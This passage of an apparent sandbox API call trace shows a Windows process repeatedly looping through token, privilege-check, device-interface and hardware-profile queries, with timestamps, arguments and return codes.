RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.699] SetLastError (dwErrCode=0x522) [0084.699] CloseHandle (hObject=0x114) returned 1 [0084.699] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.699] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.699] GetLastError () returned 0x578 [0084.699] SetLastError (dwErrCode=0x578) [0084.699] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.699] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.699] GetCurrentThread () returned 0xfffffffe [0084.699] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.699] GetLastError () returned 0x3f0 [0084.699] GetCurrentProcess () returned 0xffffffff [0084.699] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.699] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.699] SetLastError (dwErrCode=0x522) [0084.699] CloseHandle (hObject=0x114) returned 1 [0084.699] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.699] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.699] GetLastError () returned 0x578 [0084.699] SetLastError (dwErrCode=0x578) [0084.699] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.699] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.699] GetCurrentThread () returned 0xfffffffe [0084.699] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.699] GetLastError () returned 0x3f0 [0084.699] GetCurrentProcess () returned 0xffffffff [0084.699] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.699] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.699] SetLastError (dwErrCode=0x522) [0084.699] CloseHandle (hObject=0x114) returned 1 [0084.699] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.699] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.699] GetLastError () returned 0x578 [0084.699] SetLastError (dwErrCode=0x578) [0084.699] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.699] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.700] GetCurrentThread () returned 0xfffffffe [0084.700] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.700] GetLastError () returned 0x3f0 [0084.700] GetCurrentProcess () returned 0xffffffff [0084.700] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.700] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.700] SetLastError (dwErrCode=0x522) [0084.700] CloseHandle (hObject=0x114) returned 1 [0084.700] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.700] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.700] GetLastError () returned 0x578 [0084.700] SetLastError (dwErrCode=0x578) [0084.700] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.700] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.700] GetCurrentThread () returned 0xfffffffe [0084.700] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.700] GetLastError () returned 0x3f0 [0084.700] GetCurrentProcess () returned 0xffffffff [0084.700] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.700] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.700] SetLastError (dwErrCode=0x522) [0084.700] CloseHandle (hObject=0x114) returned 1 [0084.700] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.700] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.700] GetLastError () returned 0x578 [0084.700] SetLastError (dwErrCode=0x578) [0084.700] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.700] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.700] GetCurrentThread () returned 0xfffffffe [0084.700] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.700] GetLastError () returned 0x3f0 [0084.700] GetCurrentProcess () returned 0xffffffff [0084.700] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.700] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.700] SetLastError (dwErrCode=0x522) [0084.700] CloseHandle (hObject=0x114) returned 1 [0084.700] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.700] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.700] GetLastError () returned 0x578 [0084.700] SetLastError (dwErrCode=0x578) [0084.700] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.701] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.701] GetCurrentThread () returned 0xfffffffe [0084.701] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.701] GetLastError () returned 0x3f0 [0084.701] GetCurrentProcess () returned 0xffffffff [0084.701] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.701] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.701] SetLastError (dwErrCode=0x522) [0084.701] CloseHandle (hObject=0x114) returned 1 [0084.701] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.701] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.701] GetLastError () returned 0x578 [0084.701] SetLastError (dwErrCode=0x578) [0084.701] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.701] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.701] GetCurrentThread () returned 0xfffffffe [0084.701] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.701] GetLastError () returned 0x3f0 [0084.701] GetCurrentProcess () returned 0xffffffff [0084.701] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.701] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.701] SetLastError (dwErrCode=0x522) [0084.701] CloseHandle (hObject=0x114) returned 1 [0084.701] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.701] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.701] GetLastError () returned 0x578 [0084.701] SetLastError (dwErrCode=0x578) [0084.701] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.701] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.701] GetCurrentThread () returned 0xfffffffe [0084.701] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.701] GetLastError () returned 0x3f0 [0084.701] GetCurrentProcess () returned 0xffffffff [0084.701] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.701] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.701] SetLastError (dwErrCode=0x522) [0084.701] CloseHandle (hObject=0x114) returned 1 [0084.701] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.701] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.701] GetLastError () returned 0x578 [0084.701] SetLastError (dwErrCode=0x578) [0084.702] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.702] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.702] GetCurrentThread () returned 0xfffffffe [0084.702] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.702] GetLastError () returned 0x3f0 [0084.702] GetCurrentProcess () returned 0xffffffff [0084.702] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.702] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.702] SetLastError (dwErrCode=0x522) [0084.702] CloseHandle (hObject=0x114) returned 1 [0084.702] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.702] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.702] GetLastError () returned 0x578 [0084.702] SetLastError (dwErrCode=0x578) [0084.702] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.702] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.702] GetCurrentThread () returned 0xfffffffe [0084.702] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.702] GetLastError () returned 0x3f0 [0084.702] GetCurrentProcess () returned 0xffffffff [0084.702] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.702] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.702] SetLastError (dwErrCode=0x522) [0084.702] CloseHandle (hObject=0x114) returned 1 [0084.702] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.702] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.702] GetLastError () returned 0x578 [0084.702] SetLastError (dwErrCode=0x578) [0084.702] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.702] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.702] GetCurrentThread () returned 0xfffffffe [0084.702] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.702] GetLastError () returned 0x3f0 [0084.702] GetCurrentProcess () returned 0xffffffff [0084.702] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.702] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.702] SetLastError (dwErrCode=0x522) [0084.702] CloseHandle (hObject=0x114) returned 1 [0084.702] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.702] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.702] GetLastError () returned 0x578 [0084.702] SetLastError (dwErrCode=0x578) [0084.703] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.703] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.703] GetCurrentThread () returned 0xfffffffe [0084.703] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.703] GetLastError () returned 0x3f0 [0084.703] GetCurrentProcess () returned 0xffffffff [0084.703] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.703] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.703] SetLastError (dwErrCode=0x522) [0084.703] CloseHandle (hObject=0x114) returned 1 [0084.703] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.703] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.703] GetLastError () returned 0x578 [0084.703] SetLastError (dwErrCode=0x578) [0084.703] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.703] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.703] GetCurrentThread () returned 0xfffffffe [0084.703] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.703] GetLastError () returned 0x3f0 [0084.703] GetCurrentProcess () returned 0xffffffff [0084.703] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.703] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.703] SetLastError (dwErrCode=0x522) [0084.703] CloseHandle (hObject=0x114) returned 1 [0084.703] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.703] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.703] GetLastError () returned 0x578 [0084.703] SetLastError (dwErrCode=0x578) [0084.703] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.703] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.703] GetCurrentThread () returned 0xfffffffe [0084.703] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.703] GetLastError () returned 0x3f0 [0084.703] GetCurrentProcess () returned 0xffffffff [0084.703] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.703] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.703] SetLastError (dwErrCode=0x522) [0084.703] CloseHandle (hObject=0x114) returned 1 [0084.703] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.703] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.703] GetLastError () returned 0x578 [0084.703] SetLastError (dwErrCode=0x578) [0084.703] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.703] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.703] GetCurrentThread () returned 0xfffffffe [0084.704] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.704] GetLastError () returned 0x3f0 [0084.704] GetCurrentProcess () returned 0xffffffff [0084.704] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.704] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.704] SetLastError (dwErrCode=0x522) [0084.704] CloseHandle (hObject=0x114) returned 1 [0084.704] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.704] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.704] GetLastError () returned 0x578 [0084.704] SetLastError (dwErrCode=0x578) [0084.704] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.704] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.704] GetCurrentThread () returned 0xfffffffe [0084.704] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.704] GetLastError () returned 0x3f0 [0084.704] GetCurrentProcess () returned 0xffffffff [0084.704] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.704] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.704] SetLastError (dwErrCode=0x522) [0084.704] CloseHandle (hObject=0x114) returned 1 [0084.704] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.704] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.704] GetLastError () returned 0x578 [0084.704] SetLastError (dwErrCode=0x578) [0084.704] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.704] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.704] GetCurrentThread () returned 0xfffffffe [0084.704] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.704] GetLastError () returned 0x3f0 [0084.704] GetCurrentProcess () returned 0xffffffff [0084.704] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.704] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.704] SetLastError (dwErrCode=0x522) [0084.704] CloseHandle (hObject=0x114) returned 1 [0084.704] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.704] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.704] GetLastError () returned 0x578 [0084.704] SetLastError (dwErrCode=0x578) [0084.704] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.704] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.704] GetCurrentThread () returned 0xfffffffe [0084.704] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.814] GetLastError () returned 0x3f0 [0084.814] GetCurrentProcess () returned 0xffffffff [0084.814] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.814] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.814] SetLastError (dwErrCode=0x522) [0084.814] CloseHandle (hObject=0x114) returned 1 [0084.814] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.814] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.814] GetLastError () returned 0x578 [0084.814] SetLastError (dwErrCode=0x578) [0084.814] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.814] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.814] GetCurrentThread () returned 0xfffffffe [0084.814] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.814] GetLastError () returned 0x3f0 [0084.814] GetCurrentProcess () returned 0xffffffff [0084.814] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.814] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.814] SetLastError (dwErrCode=0x522) [0084.814] CloseHandle (hObject=0x114) returned 1 [0084.814] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.814] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.814] GetLastError () returned 0x578 [0084.814] SetLastError (dwErrCode=0x578) [0084.814] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.814] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.815] GetCurrentThread () returned 0xfffffffe [0084.815] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.815] GetLastError () returned 0x3f0 [0084.815] GetCurrentProcess () returned 0xffffffff [0084.815] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.815] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.815] SetLastError (dwErrCode=0x522) [0084.815] CloseHandle (hObject=0x114) returned 1 [0084.815] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.815] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.815] GetLastError () returned 0x578 [0084.815] SetLastError (dwErrCode=0x578) [0084.815] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.815] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.815] GetCurrentThread () returned 0xfffffffe [0084.815] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.815] GetLastError () returned 0x3f0 [0084.815] GetCurrentProcess () returned 0xffffffff [0084.815] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.815] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.815] SetLastError (dwErrCode=0x522) [0084.815] CloseHandle (hObject=0x114) returned 1 [0084.815] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 